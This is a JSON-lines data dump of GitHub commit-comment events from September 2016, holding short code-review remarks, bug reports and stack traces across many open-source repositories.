{"id":"4515697822","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18897410,"position":null,"line":null,"path":null,"commit_id":"d2180cb45a36b701389c6ac3bb95082dae221058","created_at":"2016-09-05T08:31:25Z","updated_at":"2016-09-05T08:31:25Z","body":"haha i find the way to detect star from mon and item\r\n\r\nfor my plan \r\n-sell item and hero\r\n\r\nif can detect star it can use to other feature \r\nstill in plan but i not too much time to dev \r\nif u can help me it can easy to dev new feature"}},"created_at":"2016-09-05T08:31:25Z"}
{"id":"4515700476","type":"CommitCommentEvent","actor":{"login":"hxlwh"},"repo":{"name":"hxlwh/SQL"},"payload":{"comment":{"id":18897420,"position":1,"line":1,"path":"README.md","commit_id":"8c3dd71163d2bf3897cc934275905fecb12460a5","created_at":"2016-09-05T08:32:04Z","updated_at":"2016-09-05T08:32:04Z","body":"存放SQL的地方"}},"created_at":"2016-09-05T08:32:04Z"}
{"id":"4515700795","type":"CommitCommentEvent","actor":{"login":"cyrus-a-bishop"},"repo":{"name":"qixuanHou/Mapping-My-Break"},"payload":{"comment":{"id":18897421,"position":null,"line":null,"path":null,"commit_id":"0c82349f72dc7f448a3542e4917853102e3de99b","created_at":"2016-09-05T08:32:10Z","updated_at":"2016-09-05T08:32:10Z","body":"The brilliance of limited force"}},"created_at":"2016-09-05T08:32:10Z"}
{"id":"4515701019","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18897423,"position":5,"line":150,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/TypeDeserializer.kt","commit_id":"744479fe9e4d4e16dc57d8e002d346502d1b6b37","created_at":"2016-09-05T08:32:12Z","updated_at":"2016-09-05T08:32:12Z","body":"A link to the issue here would be nice"}},"created_at":"2016-09-05T08:32:12Z"}
{"id":"4515704231","type":"CommitCommentEvent","actor":{"login":"bakoalex"},"repo":{"name":"bakoalex/saved-nagios-check"},"payload":{"comment":{"id":18897430,"position":null,"line":null,"path":null,"commit_id":"ef4ee107933e78d0b9bcd36fb93c07799e8510d4","created_at":"2016-09-05T08:32:59Z","updated_at":"2016-09-05T08:32:59Z","body":"OK"}},"created_at":"2016-09-05T08:32:59Z"}
{"id":"4515705802","type":"CommitCommentEvent","actor":{"login":"joelmcelroy"},"repo":{"name":"joelmcelroy/Reports"},"payload":{"comment":{"id":18897434,"position":null,"line":null,"path":null,"commit_id":"779ea11d24786228b9a7859d5821dfd8ae34add6","created_at":"2016-09-05T08:33:23Z","updated_at":"2016-09-05T08:33:23Z","body":"I never got around to using aliases, maybe I'll work on that later..!"}},"created_at":"2016-09-05T08:33:23Z"}
{"id":"4515710127","type":"CommitCommentEvent","actor":{"login":"chenna-reddy"},"repo":{"name":"makovkastar/FloatingActionButton"},"payload":{"comment":{"id":18897439,"position":null,"line":null,"path":null,"commit_id":"06efd32191812222ea567fe8ae133309112e917f","created_at":"2016-09-05T08:34:29Z","updated_at":"2016-09-05T08:34:29Z","body":"Sad to see this is deprecated.\r\nI tried FAB from Android support library, its very complex using it in Fragments, then I switched to this component.\r\nThanks anyway!\r\n"}},"created_at":"2016-09-05T08:34:29Z"}
{"id":"4515712124","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18897443,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T08:34:59Z","updated_at":"2016-09-05T08:34:59Z","body":"![](http://i.imgur.com/niwrLWn.png)"}},"created_at":"2016-09-05T08:34:59Z"}
{"id":"4515712580","type":"CommitCommentEvent","actor":{"login":"onigoetz"},"repo":{"name":"garris/BackstopJS"},"payload":{"comment":{"id":18897445,"position":null,"line":null,"path":null,"commit_id":"2b25df5d8250f10fd74bc39b7555164f81a9cd35","created_at":"2016-09-05T08:35:07Z","updated_at":"2016-09-05T08:35:07Z","body":"Sure, this looks good to me"}},"created_at":"2016-09-05T08:35:07Z"}
{"id":"4515715651","type":"CommitCommentEvent","actor":{"login":"Krishna1235"},"repo":{"name":"Krishna1235/Test-Example-2"},"payload":{"comment":{"id":18897450,"position":6,"line":6,"path":"SQL TABLE","commit_id":"5c2fb940149ab437d33029d0b8e9ea2dc71da0f3","created_at":"2016-09-05T08:35:50Z","updated_at":"2016-09-05T08:35:50Z","body":"cvbnm,./"}},"created_at":"2016-09-05T08:35:50Z"}
{"id":"4515716912","type":"CommitCommentEvent","actor":{"login":"Krishna1235"},"repo":{"name":"Krishna1235/Test-Example-2"},"payload":{"comment":{"id":18897454,"position":6,"line":6,"path":"SQL TABLE","commit_id":"5c2fb940149ab437d33029d0b8e9ea2dc71da0f3","created_at":"2016-09-05T08:36:10Z","updated_at":"2016-09-05T08:36:10Z","body":"a note"}},"created_at":"2016-09-05T08:36:10Z"}
{"id":"4515718880","type":"CommitCommentEvent","actor":{"login":"HenryQuan"},"repo":{"name":"HenryQuan/Project-Euler-Questions"},"payload":{"comment":{"id":18897455,"position":null,"line":null,"path":null,"commit_id":"4933228ea66257d8c9c6a2e82dbac935e1b2955a","created_at":"2016-09-05T08:36:37Z","updated_at":"2016-09-05T08:36:37Z","body":"The original idea is to multiply all prime numbers which are below 20.\r\nHowever, that is not the case. It won't work for 16(2^4) and 9(3^2).\r\nTherefore, I have to test the 2nd, 3rd ... power of each prime until it is bigger than 20 so that I could get the correct answer."}},"created_at":"2016-09-05T08:36:37Z"}
{"id":"4515719953","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"LinaChetverkina/235449-technomart"},"payload":{"comment":{"id":18897456,"position":5,"line":13,"path":"css/style.css","commit_id":"ee17be9b9de89e03963d393fed9ffba02ee03ad7","created_at":"2016-09-05T08:36:52Z","updated_at":"2016-09-05T08:36:52Z","body":"Не верный ход. Для body ты задаешь основной шрифт, безопасный и общий тип шрифта. Т.е. Cuprum, Arial, sans-serif было правильно. PT Sans шрифт дополнительный и в body совсем не нужен"}},"created_at":"2016-09-05T08:36:52Z"}
{"id":"4515721199","type":"CommitCommentEvent","actor":{"login":"Seunghtung"},"repo":{"name":"ktw3722/With-Share"},"payload":{"comment":{"id":18897461,"position":null,"line":null,"path":null,"commit_id":"2bd18edfce20edc2470159e0111f3bd275bd7a9c","created_at":"2016-09-05T08:37:10Z","updated_at":"2016-09-05T08:37:10Z","body":"최종본"}},"created_at":"2016-09-05T08:37:10Z"}
{"id":"4515724504","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18897467,"position":8,"line":32,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-05T08:37:55Z","updated_at":"2016-09-05T08:37:55Z","body":"Doesn't it though? How about ```zipfile.BadZipFile```?"}},"created_at":"2016-09-05T08:37:55Z"}
{"id":"4515729049","type":"CommitCommentEvent","actor":{"login":"wmertens"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":18897478,"position":null,"line":null,"path":null,"commit_id":"5829fbe9265bca8cfb2322e4fe0d662d91e7c592","created_at":"2016-09-05T08:38:59Z","updated_at":"2016-09-05T08:38:59Z","body":"😁"}},"created_at":"2016-09-05T08:38:59Z"}
{"id":"4515729484","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18897480,"position":null,"line":null,"path":null,"commit_id":"60be5a672a87b27cc7cd8aec08c826cb0dd04257","created_at":"2016-09-05T08:39:06Z","updated_at":"2016-09-05T08:39:06Z","body":"Testing under Solaris with SunCC 5.14 revealed:\r\n\r\n```\r\nopt/developerstudio12.5/bin/CC -DDEBUG -g3 -O0 -std=c++11 -D__SSE2__ -D__SSE3__ -D__SSSE3__ -m64 -native -KPIC -template=no%extdef -w -erroff=wvarhidemem -erroff=voidretw -c xtr.cpp\r\n\"seckey.h\", line 265: Error: Constexpr function CryptoPP::SimpleKeyingInterfaceImpl<CryptoPP::TwoBases<CryptoPP::BlockCipher, CryptoPP::SHACAL2_Info>, CryptoPP::TwoBases<CryptoPP::BlockCipher, CryptoPP::SHACAL2_Info>>::MinKeyLength can not be virtual.\r\n```\r\n\r\nClang and GCC accepted the `constexpr` on functions like `MinKeyLength`. Man, its nice to work on a dev-branch without worry of breaking Master :)\r\n"}},"created_at":"2016-09-05T08:39:06Z"}
{"id":"4515732703","type":"CommitCommentEvent","actor":{"login":"aedonis"},"repo":{"name":"aedonis/octopus"},"payload":{"comment":{"id":18897482,"position":null,"line":null,"path":null,"commit_id":"7c410be0bf70feda9a16d6db71219fceb0ab1e64","created_at":"2016-09-05T08:39:49Z","updated_at":"2016-09-05T08:39:49Z","body":"Not sure why this commit got into the repository, removing and locking."}},"created_at":"2016-09-05T08:39:49Z"}
{"id":"4515736296","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18897489,"position":12,"line":12,"path":"ChickenAdventure/Assets/Scripts/Arme.cs","commit_id":"75e82d382b437fcecaea3da2a3f51197ae2157fb","created_at":"2016-09-05T08:40:37Z","updated_at":"2016-09-05T08:40:37Z","body":"Vous faites du C#, alors faites du C# pas du Java ;-)\r\n\r\n```\r\npublic class Arme {\r\n    public int Dmg;\r\n}\r\n```\r\n\r\nhttps://msdn.microsoft.com/en-us/library/w86s7x04.aspx"}},"created_at":"2016-09-05T08:40:37Z"}
{"id":"4515737045","type":"CommitCommentEvent","actor":{"login":"array88"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":18897490,"position":null,"line":null,"path":null,"commit_id":"4b1a74f7c94fd33d619eca2a84f7b1c4e4439360","created_at":"2016-09-05T08:40:47Z","updated_at":"2016-09-05T08:40:47Z","body":"（依然与此commit无关）\r\n狂骨的描述竟然没写锁定技……"}},"created_at":"2016-09-05T08:40:47Z"}
{"id":"4515737209","type":"CommitCommentEvent","actor":{"login":"johguenther"},"repo":{"name":"ospray/OSPRay"},"payload":{"comment":{"id":18897491,"position":null,"line":null,"path":null,"commit_id":"91107dea6d6795d269623213d59d9cefd9c08aa4","created_at":"2016-09-05T08:40:49Z","updated_at":"2016-09-05T08:40:49Z","body":"Done."}},"created_at":"2016-09-05T08:40:49Z"}
{"id":"4515739725","type":"CommitCommentEvent","actor":{"login":"zenixje"},"repo":{"name":"DJOAmersfoort/IdentityProviderBeta"},"payload":{"comment":{"id":18897497,"position":null,"line":null,"path":null,"commit_id":"3e35027c8cc826bf208a9420b0260046dbdbaf38","created_at":"2016-09-05T08:41:24Z","updated_at":"2016-09-05T08:41:24Z","body":"Roelof Windesheim probeert contact met je op te nemen want security engineering is begonnen. Zie je school mail."}},"created_at":"2016-09-05T08:41:24Z"}
{"id":"4515739742","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18897498,"position":35,"line":81,"path":"test/Smoke/st_outOfOrderTest.js","commit_id":"fa6a662dda6013ec979695c5a3114d5dabcc1f33","created_at":"2016-09-05T08:41:24Z","updated_at":"2016-09-05T08:41:24Z","body":"@AlvaroDazaQuiroga @angy113 \r\nthe complementUrl -> could be returned from another place..."}},"created_at":"2016-09-05T08:41:24Z"}
{"id":"4515747457","type":"CommitCommentEvent","actor":{"login":"FranckCao"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18897510,"position":null,"line":null,"path":null,"commit_id":"18d6d85320cfc20605219bbcfa7ff27b57528a53","created_at":"2016-09-05T08:43:13Z","updated_at":"2016-09-05T08:43:13Z","body":"I download the latest version, but this issue still exists. I guess this bug were not fixed completely."}},"created_at":"2016-09-05T08:43:13Z"}
{"id":"4515750512","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18897514,"position":8,"line":8,"path":"ChickenAdventure/Assets/Scripts/BatonSorcier.cs","commit_id":"75e82d382b437fcecaea3da2a3f51197ae2157fb","created_at":"2016-09-05T08:44:00Z","updated_at":"2016-09-05T08:44:00Z","body":"```csharp\r\npublic BatonSorcier() : base()\r\n{\r\n    Dmg = 5;\r\n}\r\n```"}},"created_at":"2016-09-05T08:44:00Z"}
{"id":"4515752556","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"SommerNicolas/ChickenAdventure"},"payload":{"comment":{"id":18897521,"position":16,"line":16,"path":"ChickenAdventure/Assets/Scripts/Items.cs","commit_id":"75e82d382b437fcecaea3da2a3f51197ae2157fb","created_at":"2016-09-05T08:44:30Z","updated_at":"2016-09-05T08:44:30Z","body":"Idem `public int Id`"}},"created_at":"2016-09-05T08:44:30Z"}
{"id":"4515756965","type":"CommitCommentEvent","actor":{"login":"miha-plesko"},"repo":{"name":"emc-advanced-dev/unik"},"payload":{"comment":{"id":18897528,"position":31,"line":30,"path":"pkg/providers/openstack/stage.go","commit_id":"e703f8e34dc1906a298d30dfd6534297ce39cda8","created_at":"2016-09-05T08:45:32Z","updated_at":"2016-09-05T08:45:32Z","body":"As far as I can understand the [code](https://github.com/openstack/glance/blob/master/glance/api/v2/images.py#L235), image delete is async. \r\nSee also [this](https://bugs.launchpad.net/glance/+bug/1316234) bug that is marked as 'won't fix'. \r\nStill not 100% sure though."}},"created_at":"2016-09-05T08:45:32Z"}
{"id":"4515758550","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18897530,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T08:45:56Z","updated_at":"2016-09-05T08:45:56Z","body":"I don't know what I'm looking at."}},"created_at":"2016-09-05T08:45:56Z"}
{"id":"4515759672","type":"CommitCommentEvent","actor":{"login":"DenisVuyka"},"repo":{"name":"Alfresco/alfresco-ng2-components"},"payload":{"comment":{"id":18897531,"position":35,"line":41,"path":"ng2-components/ng2-alfresco-core/src/services/AlfrescoAuthentication.service.ts","commit_id":"5773b88ab4d690b1de827b04b13b5e4344436dd1","created_at":"2016-09-05T08:46:14Z","updated_at":"2016-09-05T08:46:14Z","body":"Was thinking about the same but with current js-api implementation it's quite tricky setting tickets outside of the constructor. We can simplify that as part of future js-api improvements"}},"created_at":"2016-09-05T08:46:14Z"}
{"id":"4515761332","type":"CommitCommentEvent","actor":{"login":"paultcochrane"},"repo":{"name":"perl6/perl6-examples"},"payload":{"comment":{"id":18897533,"position":null,"line":null,"path":null,"commit_id":"0838dc2282b57842c8530bd7bfe5e5e7a09e31c3","created_at":"2016-09-05T08:46:36Z","updated_at":"2016-09-05T08:46:36Z","body":"Have removed the parens on the ifs.\r\n\r\n@shlomif: just wondering what the `if False` blocks are for.  Is it ok to remove them, or should I maybe add a debug flag so that one can run them if desired?"}},"created_at":"2016-09-05T08:46:36Z"}
{"id":"4515762511","type":"CommitCommentEvent","actor":{"login":"harleysmomy"},"repo":{"name":"harleysmomy/profile_unlock"},"payload":{"comment":{"id":18897537,"position":null,"line":null,"path":null,"commit_id":"011e9c6811f478c4013ced59916b21eff4a9310c","created_at":"2016-09-05T08:46:51Z","updated_at":"2016-09-05T08:46:51Z","body":"profile_unlock.module profile_unlock.info"}},"created_at":"2016-09-05T08:46:51Z"}
{"id":"4515765978","type":"CommitCommentEvent","actor":{"login":"easylo"},"repo":{"name":"dmnpignaud/avrodoc"},"payload":{"comment":{"id":18897542,"position":5,"line":33,"path":"app.js","commit_id":"f9906f197f6e23927fda115470a3d020c35d3476","created_at":"2016-09-05T08:47:40Z","updated_at":"2016-09-05T08:47:40Z","body":"tu peux tester avec /documentation/ ?"}},"created_at":"2016-09-05T08:47:40Z"}
{"id":"4515771550","type":"CommitCommentEvent","actor":{"login":"edolstra"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18897549,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-05T08:48:57Z","updated_at":"2016-09-05T08:48:57Z","body":"@shlevy \"nested bin dir\"?"}},"created_at":"2016-09-05T08:48:57Z"}
{"id":"4515775873","type":"CommitCommentEvent","actor":{"login":"superbobry"},"repo":{"name":"pytries/marisa-trie"},"payload":{"comment":{"id":18897558,"position":100,"line":207,"path":"src/marisa_trie.pyx","commit_id":"5938146a9df49d544c829d28f5c14a0bb9aa3ada","created_at":"2016-09-05T08:49:58Z","updated_at":"2016-09-05T08:49:58Z","body":"Thanks, I somehow missed that. Will fix in the next commit."}},"created_at":"2016-09-05T08:49:58Z"}
{"id":"4515777660","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18897562,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T08:50:24Z","updated_at":"2016-09-05T08:50:24Z","body":"Me neither and that's the issue :) For workspace symbols it doesn't prefix method names with type name for method arguments."}},"created_at":"2016-09-05T08:50:24Z"}
{"id":"4515782650","type":"CommitCommentEvent","actor":{"login":"fernand0"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":18897574,"position":null,"line":null,"path":null,"commit_id":"a3f0ec60abe69f1ce876a37b6c840b310158cf0e","created_at":"2016-09-05T08:51:34Z","updated_at":"2016-09-05T08:51:34Z","body":"Hola,\n\n¿Qué codificación utilizas? Mi sistema ni siquiera la reconoce...\n\nOn Mon, Sep 5, 2016 at 8:35 AM, Juan Julián Merelo Guervós <\nnotifications@github.com> wrote:\n\n> Comenzado el artículo\n>\n> Revisad y continuad, @fernand0 y @juanjoue. Si queréis discutir un poco,\n> en estos mismos commits o en un issue.\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/ReVision-Docencia-20/Columnas/commit/\n> a3f0ec60abe69f1ce876a37b6c840b310158cf0e\n\n\n\n\n-- \nFernando Tricas\nhttp://elmundoesimperfecto.com/\n"}},"created_at":"2016-09-05T08:51:34Z"}
{"id":"4515786400","type":"CommitCommentEvent","actor":{"login":"array88"},"repo":{"name":"Mogara/QSanguosha-For-Hegemony"},"payload":{"comment":{"id":18897579,"position":null,"line":null,"path":null,"commit_id":"4b1a74f7c94fd33d619eca2a84f7b1c4e4439360","created_at":"2016-09-05T08:52:29Z","updated_at":"2016-09-05T08:52:29Z","body":"另外最近似乎经常出现AI出牌阶段卡住无响应，最后栈溢出的问题。。。以下是其中一次的服务器信息\r\n\r\nlua/ai/smart-ai.lua:3969: attempt to index local 'from' (a nil value)\r\naskForPlayersChosen\r\nstack traceback:\r\n\tlua/ai/smart-ai.lua:259: in function <lua/ai/smart-ai.lua:239>\r\nEvent Stack:\r\nevent[54], room[5], target = sgs44[jiaxu]\r\nevent[49], room[5], target = sgs41[weiyan]\r\nevent[48], room[5], target = sgs44[jiaxu]\r\nevent[64], room[5], target = sgs44[jiaxu]\r\nevent[58], room[5], target = sgs41[weiyan]\r\nevent[4], room[5], target = sgs41[weiyan]\r\nevent[2], room[5], target = sgs41[weiyan]\r\nEnd of Event Stack.\r\nThe result of function askForPlayersChosen should all a table!\r\njiaxu/zhangjiao gP:shu>>> Shu1 Qun1 Wei0 Wu0 \r\njiaxu/zhangjiao gP:shu>>> Shu1 Qun1 Wei0 Wu0 \r\nweiyan/huangzhong gP:shu>>> Shu1 Qun1 Wei0 Wu0 \r\nlua/ai/smart-ai.lua:4298: stack overflow\r\nactivate\r\nstack traceback:\r\n\tlua/ai/smart-ai.lua:259: in function <lua/ai/smart-ai.lua:239>\r\nEvent Stack:\r\nevent[4], room[5], target = sgs44[jiaxu]\r\nevent[2], room[5], target = sgs44[jiaxu]\r\nEnd of Event Stack."}},"created_at":"2016-09-05T08:52:29Z"}
{"id":"4515791869","type":"CommitCommentEvent","actor":{"login":"psyeugenic"},"repo":{"name":"erlang/otp"},"payload":{"comment":{"id":18897586,"position":26,"line":1029,"path":"lib/compiler/src/v3_kernel.erl","commit_id":"5952225c88e9b74fdda44865eaae6432f79c4770","created_at":"2016-09-05T08:53:47Z","updated_at":"2016-09-05T08:53:47Z","body":"With 'non-true' I mean a clause with a guard test. 'false' clauses should already have been pruned."}},"created_at":"2016-09-05T08:53:47Z"}
{"id":"4515792591","type":"CommitCommentEvent","actor":{"login":"gloomy-ghost"},"repo":{"name":"EFForg/https-everywhere"},"payload":{"comment":{"id":18897588,"position":null,"line":null,"path":null,"commit_id":"5207ba15ce2c52ca71c4567df49d3d14e3ff4007","created_at":"2016-09-05T08:53:57Z","updated_at":"2016-09-05T08:53:57Z","body":"已经进preload list的域名感觉没必要再加到https everywhere……能装这插件的浏览器都支持preload了"}},"created_at":"2016-09-05T08:53:57Z"}
{"id":"4515794543","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18897592,"position":null,"line":null,"path":null,"commit_id":"d6b4dea7cb3cc15383ff02310ab166825ae69285","created_at":"2016-09-05T08:54:24Z","updated_at":"2016-09-05T08:54:24Z","body":"Nice :-)"}},"created_at":"2016-09-05T08:54:24Z"}
{"id":"4515797964","type":"CommitCommentEvent","actor":{"login":"KirDE"},"repo":{"name":"catfan/Medoo"},"payload":{"comment":{"id":18897597,"position":null,"line":null,"path":null,"commit_id":"e893cb203e9fce866317571c59372ba5d5917ebc","created_at":"2016-09-05T08:55:15Z","updated_at":"2016-09-05T08:55:15Z","body":"\r\n// SQL LIKE Wildcard\r\n// You can use SQL wildcard to match more complex situation\r\n$database->select(\"person\", \"id\", [\r\n\t\"city[~]\" => \"%stan\" // Kazakhstan,  Uzbekistan, Türkmenistan\r\n]);\r\n \r\n$database->select(\"person\", \"id\", [\r\n\t\"city[~]\" => **\"Londo_\"** // London, Londox, Londos...\r\n]);\r\n "}},"created_at":"2016-09-05T08:55:15Z"}
{"id":"4515798231","type":"CommitCommentEvent","actor":{"login":"ZS1994"},"repo":{"name":"ZS1994/cs_zs"},"payload":{"comment":{"id":18897599,"position":null,"line":null,"path":null,"commit_id":"72a454d6b22860cd0f82d57b978fd5da60c365bf","created_at":"2016-09-05T08:55:19Z","updated_at":"2016-09-05T08:55:19Z","body":"回退"}},"created_at":"2016-09-05T08:55:19Z"}
{"id":"4515799282","type":"CommitCommentEvent","actor":{"login":"cmaumet"},"repo":{"name":"INCF/bidsutils"},"payload":{"comment":{"id":18897600,"position":null,"line":null,"path":null,"commit_id":"020d88fd5dc974f19284bb0bf426ec8ed60b715f","created_at":"2016-09-05T08:55:33Z","updated_at":"2016-09-05T08:55:33Z","body":"Does this also include the changes from https://github.com/INCF/bidsutils/pull/2?"}},"created_at":"2016-09-05T08:55:33Z"}
{"id":"4515808685","type":"CommitCommentEvent","actor":{"login":"jordwalke"},"repo":{"name":"let-def/Reason"},"payload":{"comment":{"id":18897611,"position":7,"line":42,"path":"src/ocamlmerlin_reason.ml","commit_id":"361a319a8785084d32b7bbb4d2e6e5f17da58bab","created_at":"2016-09-05T08:57:43Z","updated_at":"2016-09-05T08:57:43Z","body":"Is the `lazy` just to benefit from memoizing?"}},"created_at":"2016-09-05T08:57:43Z"}
{"id":"4515810078","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897614,"position":17,"line":55,"path":"service/mcs/persistent/src/main/resources/create_cassandra_schema.cql","commit_id":"5384eba149ca4b53735fe86c88c50d3ae4c6e560","created_at":"2016-09-05T08:58:04Z","updated_at":"2016-09-05T08:58:04Z","body":"This table should also be added to docker script"}},"created_at":"2016-09-05T08:58:04Z"}
{"id":"4515810104","type":"CommitCommentEvent","actor":{"login":"jvperrin"},"repo":{"name":"ocf/utils"},"payload":{"comment":{"id":18897615,"position":null,"line":null,"path":null,"commit_id":"fc84cd97ed28ef12e44d905f864a40e062906e69","created_at":"2016-09-05T08:58:04Z","updated_at":"2016-09-05T08:58:04Z","body":"Bashing on bash again?"}},"created_at":"2016-09-05T08:58:04Z"}
{"id":"4515810211","type":"CommitCommentEvent","actor":{"login":"danielemontesi"},"repo":{"name":"DavidWiesner/oauth2-server-pdo"},"payload":{"comment":{"id":18897616,"position":null,"line":null,"path":null,"commit_id":"a2dc56c265c84a846e9b46e5fd70ede37a1f3c34","created_at":"2016-09-05T08:58:05Z","updated_at":"2016-09-05T08:58:05Z","body":"Why did you comment the users table ?\r\n\r\nRegards"}},"created_at":"2016-09-05T08:58:05Z"}
{"id":"4515810519","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18897617,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T08:58:11Z","updated_at":"2016-09-05T08:58:11Z","body":"And you're saying it works for document symbols? That doesn't make any sense, they use the exact same code for this."}},"created_at":"2016-09-05T08:58:11Z"}
{"id":"4515810563","type":"CommitCommentEvent","actor":{"login":"Babygogogo"},"repo":{"name":"Babygogogo/BabyWars"},"payload":{"comment":{"id":18897618,"position":null,"line":null,"path":null,"commit_id":"1e36c4044030b9ed39e17b56010960a09d1963fb","created_at":"2016-09-05T08:58:11Z","updated_at":"2016-09-05T08:58:11Z","body":"This should fix #68 ."}},"created_at":"2016-09-05T08:58:11Z"}
{"id":"4515815293","type":"CommitCommentEvent","actor":{"login":"jenigamracy"},"repo":{"name":"jenigamracy/hackerrank"},"payload":{"comment":{"id":18897632,"position":null,"line":null,"path":null,"commit_id":"c2c6e21db49ee6e2ded2573801d86a86f4b7656a","created_at":"2016-09-05T08:59:18Z","updated_at":"2016-09-05T08:59:18Z","body":"This covers cases where size = 1 and 2.  For arrays of size = 3, it will solve an array like {1, 2, 3} and {1, 3, 2}.  Next up is actually partioning and sorting the sub-arrays."}},"created_at":"2016-09-05T08:59:18Z"}
{"id":"4515818551","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18897637,"position":null,"line":null,"path":null,"commit_id":"b0d04033729d08203c0143caf0499627c07e04d0","created_at":"2016-09-05T09:00:05Z","updated_at":"2016-09-05T09:00:05Z","body":"yeah :)\r\n![](http://i.imgur.com/45Z2iWf.png)"}},"created_at":"2016-09-05T09:00:05Z"}
{"id":"4515820235","type":"CommitCommentEvent","actor":{"login":"zuroba"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":18897641,"position":null,"line":null,"path":null,"commit_id":"a680399e7913ce99739430b541a4669fb676b6d8","created_at":"2016-09-05T09:00:27Z","updated_at":"2016-09-05T09:00:27Z","body":"ยังงี้ถ้าจะให้เยอะๆก็แก้ rand(25) เป็นสัก 50 ก็ได้ใช่ไหมท่านแล้วก็\r\n\r\nmrand == 49 ถึง 49"}},"created_at":"2016-09-05T09:00:27Z"}
{"id":"4515822018","type":"CommitCommentEvent","actor":{"login":"tarekkh"},"repo":{"name":"europeana/Europeana-Cloud"},"payload":{"comment":{"id":18897646,"position":null,"line":null,"path":null,"commit_id":"5384eba149ca4b53735fe86c88c50d3ae4c6e560","created_at":"2016-09-05T09:00:50Z","updated_at":"2016-09-05T09:00:50Z","body":"We should create java client calls for the newelly added rest API's"}},"created_at":"2016-09-05T09:00:50Z"}
{"id":"4515823084","type":"CommitCommentEvent","actor":{"login":"dmenin"},"repo":{"name":"martin-gorner/tensorflow-mnist-tutorial"},"payload":{"comment":{"id":18897649,"position":null,"line":null,"path":null,"commit_id":"5d0a9b1a8468b3ae18d38e183187df435be56871","created_at":"2016-09-05T09:01:04Z","updated_at":"2016-09-05T09:01:04Z","body":"The decay_speed  variable is an integer, so the learning rate starts at 0.003 and drops to  0.0011668503794 after the first iteration, staying like so for a long time, until it drops again.\r\nShouldn't decay_speed be a float so the Learning rate would drop like so:\r\n\r\nIteration 0 : Learning Rate:0.003\r\nIteration 20 : Learning Rate:0.00297114451787\r\nIteration 40 : Learning Rate:0.00294257615259\r\nIteration 60 : Learning Rate:0.00291429204729\r\nIteration 80 : Learning Rate:0.00288628937354\r\nIteration 100 : Learning Rate:0.00285856533105"}},"created_at":"2016-09-05T09:01:04Z"}
{"id":"4515823693","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18897650,"position":147,"line":147,"path":"huangyi/stocktaking/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T09:01:13Z","updated_at":"2016-09-05T09:01:13Z","body":"这一url用到了两次，应该常量存储起来。"}},"created_at":"2016-09-05T09:01:13Z"}
{"id":"4515827086","type":"CommitCommentEvent","actor":{"login":"catfan"},"repo":{"name":"catfan/Medoo"},"payload":{"comment":{"id":18897657,"position":null,"line":null,"path":null,"commit_id":"e893cb203e9fce866317571c59372ba5d5917ebc","created_at":"2016-09-05T09:01:59Z","updated_at":"2016-09-05T09:01:59Z","body":"So, what's the problem?\r\n\r\n`_` matches for a single character, and `%` matches zero or more."}},"created_at":"2016-09-05T09:01:59Z"}
{"id":"4515828767","type":"CommitCommentEvent","actor":{"login":"mohamedaymenkarmous"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18897659,"position":null,"line":null,"path":null,"commit_id":"75a45481ed53662d2625ad16b14924b5941ac587","created_at":"2016-09-05T09:02:23Z","updated_at":"2016-09-05T09:02:23Z","body":"Finally after 8 Moths and 5 days"}},"created_at":"2016-09-05T09:02:23Z"}
